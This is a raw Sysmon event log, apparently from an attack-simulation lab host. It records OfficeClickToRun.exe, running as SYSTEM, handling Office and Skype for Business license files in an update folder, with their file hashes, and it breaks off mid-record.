23542300x800000000000000067872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-msMD5=644B5A4BEE4173ABA4F5FEEFDE87FA10,SHA256=3CA8EF883CD2869D26CDA4D5EBC74E64B2BCEC62E6308EF62C72EA99A9057361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeServiceBypassR_PrepidBypass-ppd.xrm-msMD5=D0E51BB31F15006697469A7952154A04,SHA256=A6AC20EF7DBF12203DB88C2C98EE3E9D8868D099C69A78FEC17F8449AD83ACE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessVL_MAK-ul-phn.xrm-msMD5=A82BAA94AFC0DEE0598561ABD2DF044E,SHA256=5BF94D85D0EA54FECE5F01475BAFAE6C27AAB984C54620C5A7828B70AF175AE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessVL_MAK-ul-oob.xrm-msMD5=116E9627A3346931DAA0C3B59464E943,SHA256=42B7DCD18F48C70DDB7E19D3BDE2C5B7A5E53EB476A030D71CAD1A53DF60DFCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessVL_MAK-ppd.xrm-msMD5=7981652ADCD09C8F47A1EA51C6EAE116,SHA256=98DED35AC9B482ED07DA53BCADBDD74122D307FBFDC2113FC140B9F80998C7BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessVL_MAK-pl.xrm-msMD5=3C5524AB7E9D1F12D8A10D1286AC9558,SHA256=B17D61D1A81E9825E3061ACE1028F7F4A4A237B5CB78F02E91DE67B079544ED4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessVL_KMS_Client-ul.xrm-msMD5=41D6086514F2AA99D3159326672A121F,SHA256=9D06012ADCB15E62E417A515C19FB8C647EC1928D172B2A4729B188DAD8F89D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessVL_KMS_Client-ul-oob.xrm-msMD5=B9F31159FBAC29FCF6EB655716E3DFD3,SHA256=4D0A066CF2C5B42FC434A79934F7B6C44C1C91C2942AC531832D62E6CFDCDEA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessVL_KMS_Client-ppd.xrm-msMD5=FC9D1D99829C906B7EBA331920C173CF,SHA256=4E6221AF82E8A27447FBEFCB9E53D937C01C65BF8560AE3939ACF0F8ADD986CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Trial-ul-oob.xrm-msMD5=5E9CB3A1264017720394FC1CD77B3FA4,SHA256=7DFAC4739E057CCC889D5942071510514A80C0865934AB83DAC11BC37A5736B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Trial-ppd.xrm-msMD5=D378E3898E687893C228EECCD24BB810,SHA256=EA9A4756E15A39219E96F4B2B72B7872AB7CBCDD8C8B69EA9FAF7CAFFE8F4D77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Trial-pl.xrm-msMD5=12489E3786ABE511B6714337FFBE1998,SHA256=7C9E96912699E897F8DED4A0492D8E7C2B0499015B475DD4FE89E04AE9A60AB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Retail-ul-phn.xrm-msMD5=E06D3E837E50E449F14C7FF97FF15C1E,SHA256=D8AE8C8C784D4D8F84383FD93F0ACA4D85AE53F2DC30680026F2D21C38C25F38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Retail-ul-oob.xrm-msMD5=62FCA31B5D29BD9F9231427DF7EFA68E,SHA256=F60B0489EAB5E88BE59DB64FDE0511B95FE7345D517B3FBF5B2E156C36753504,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Retail-ppd.xrm-msMD5=CAFD2F08295E30196D99F80786F92360,SHA256=422369D490267408CD5A93FE09F7D6DAE538CE2CF5A7C1AEF4B3B59C27C7B09E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Retail-pl.xrm-msMD5=BAA36DB93B339021C5E3146EC882DEC2,SHA256=0626DA05ADEE83025C0607C99A21084B5350CF60FE39BF295EF486F329767EB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Grace-ul-oob.xrm-msMD5=33EF01B8CB8F9F902416C464954A8B13,SHA256=6F928C50C785F11F491BE803D23B5B9E3B1DF91C0326DB9246396DC5220C512E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessR_Grace-ppd.xrm-msMD5=D2CC56A524CF023B41BB52A349712521,SHA256=AB641E48F7FC6D1C8841CD0E1CF894CA428AEE1B1903BEC8C90923EE2B09EAD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-msMD5=49CE54837E13776CEAEF6F85CBD16EC9,SHA256=E8EFA2484B379E0B67528ED2537C0F017CCC20B51BAC48152B7E11D7081F1BF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-msMD5=8649407DAE820A332595044608880EE2,SHA256=681FDC961DEA73E499879952DD56375C6BED45C7B69143DFC5D211F18D0FB820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessEntry2019R_PrepidBypass-ul-oob.xrm-msMD5=549C4E1EFC645ABE19958D593B02A8CB,SHA256=34BE9A0CB4B97E8DA36F66CA380CFC9C43D04C63DBA9128072F6578B3A620C67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusinessEntry2019R_PrepidBypass-ppd.xrm-msMD5=F0FFA073585E29814896E58DC76DCBD6,SHA256=D7CDC2A07705A981110615BAD72C3FDFBC68BADD30F5F5ED422C3BC11B37263E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-msMD5=F6E8A04A3CFF2CB62086EB75F60B592A,SHA256=A914C59F62FB1ADD29C4523180575C1376B703083255CBBA2C92494C39F8AE04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-oob.xrm-msMD5=86C2927CC9FBC8AEAE740E962F49B162,SHA256=C31E60A8DEDF624FB1B5CF1AAB27B368BE4D0C403C75BE8CF373115A13A015B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ppd.xrm-msMD5=AEF02B43FA923CA6654BFA981D99E516,SHA256=D751B7F48B111673F159DFB77F6671814555756EB410C6C48159FC6E5AFFA0A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-pl.xrm-msMD5=63056102C4989E47F500B663AB7BB018,SHA256=B683545274B391FEE901ED6A4673B8A57131F89955D5F8C67FC92A2AEF96C470,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul.xrm-msMD5=0263D884C6ECD81623589F74EDC88DD1,SHA256=5B14D211BC9C54C6F40DEAAA075C1B5FAC83AA781DB112A2AE59999F8882F541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=CA046CC7E26BD0B118579433EE0CF4F0,SHA256=26DB13643E85838E6BC2F2A9AF0AFF409EC6774F6B07D317891DE7405F192036,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ppd.xrm-msMD5=14454A72861E8C5680AAB9E4B6B008F9,SHA256=297EC5FFA9D1696F8A889C07ADBC6B8F15C1281BBBFF166F8DC8F147DB3A9509,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Trial-ul-oob.xrm-msMD5=AFD28C445E736A283EE7FC95D97F77ED,SHA256=3E807329FE2B5595ADA3FC3102FB61A4554ED3400F57C1A8F7785ADB1897D1FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Trial-ppd.xrm-msMD5=FFF42BC9753DD25B225066C688AFFCE6,SHA256=69B40E7B2EE995C82399724CC7B6F76A90725B97F913F2E492137F9723199EB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Trial-pl.xrm-msMD5=36CCB72A780C288ACD2A5D48D881F30C,SHA256=D0C582EF91BCBDD9D81D79BBC94642B9626B4EE64747F9F47016000171F12A1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-msMD5=4696E2BE10ED2179C488AA17051F807E,SHA256=E9ABA710532364BFC0FC5F9F2E682F646EEAE4FD6BB0C217D9F194B11A3BC0BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Retail-ul-oob.xrm-msMD5=09F00419147F0D5037FDE28F954FCB54,SHA256=27CAEA7F7A14682D8B5E296E1D670791A9FB9F199EFAC2385B2EC7E28601D045,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Retail-ppd.xrm-msMD5=09DB52F7289F26E8824FC156362714AF,SHA256=EE96CDC2B69A35616BDFF6BB04167B14DA4B4B6052797060045AB9DE760BE9FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Retail-pl.xrm-msMD5=5414D8CFCB1E6F8A22B593B9BBA2DF3B,SHA256=49C7B7B8D1B0D85DE4C64B7FC03B0F6E9D6D9467887A006086B54476A277656C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Grace-ul-oob.xrm-msMD5=FBA2D63A87B8BDDDD655BD38753CC898,SHA256=A72A826AE2455CFEC7A781B3A3012E20517E7CB41A7A9AE63BE056AD825DFDF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\SkypeforBusiness2019R_Grace-ppd.xrm-msMD5=9E567FB4AD6C445B29B4FCB4F87A3DB6,SHA256=5156C56CE9183AFA47306FBD2C5BDC8DC5EED7B2E2A81DCFB9E408548655407E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherVL_MAK-ul-phn.xrm-msMD5=D360C65359C97B820B5462DD8827ED4C,SHA256=9146E3B6E05E00746CC48AB5773E275CB60E69A38427372EDA69C27285CEF674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherVL_MAK-ul-oob.xrm-msMD5=7FDD276C57AB09D6C26BDDE16D04280B,SHA256=3888E46574842182B4A874738E8EA78E61F6ADF38B645993C0375EA617FE9F11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherVL_MAK-ppd.xrm-msMD5=61A96AC85758BDF6780F21ABCC34B5E3,SHA256=6490AE0902607167D452620AFB94CA7CD20716DCD1E0A12267102B381C17A4E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherVL_MAK-pl.xrm-msMD5=04E2721FA7A94C32E6173F80C3D920BF,SHA256=EAAA0315ECE94F4C64AD3D494260C21D42D75A56C7C6342EF68F7022A33CBA82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherVL_KMS_Client-ul.xrm-msMD5=1B794305C45AA7792ED231BF3B8CAD7C,SHA256=8AE38821E4686C68A69F0043013E7F18B9EB134753DF77EE95EDCEA28405857E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 